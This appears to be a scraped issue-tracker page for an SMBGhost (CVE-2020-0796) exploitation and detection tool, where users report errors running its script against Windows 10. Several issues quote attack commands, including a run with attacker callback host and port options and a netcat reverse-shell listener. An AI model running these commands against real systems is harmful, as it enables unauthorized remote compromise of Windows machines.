SMBGhost_AutomateExploitation icon indicating copy to clipboard operation
SMBGhost_AutomateExploitation copied to clipboard

SMBGhost (CVE-2020-0796) Automate Exploitation and Detection

Results 4 SMBGhost_AutomateExploitation issues
Sort by recently updated
recently updated
newest added

hi any command returns this error, Smb_Ghost.py: error: the following arguments are required: -i/--ip what I've tried: Smb_Ghost.py -i x.x.x.x -p 445 --check -e --lhost x.x.x.x --lport 80 Smb_Ghost.py --ip...

after i run "nc -lvp 4444 " i have this error [-] physical read primitive failed!

![image](https://github.com/user-attachments/assets/833ed6fd-f420-4c49-8ce8-f8c8212cd31b) I received this error when attempting to run the Smb_Ghost.py script on a Kali Linux 2024.3 machine against a Windows 10 ver. 1903 build 18362.356 machine. As it turns...

![image](https://github.com/user-attachments/assets/7c4d7cf0-4f31-4339-9ed7-10ba312a145f) I had this issue on a Kali Linux ver. 2024.3 virtual machine when trying to run Smb_Ghost.py using Python3 ver. 3.12.7. Using the command `sudo pip3 install --break-system-packages hexdump`...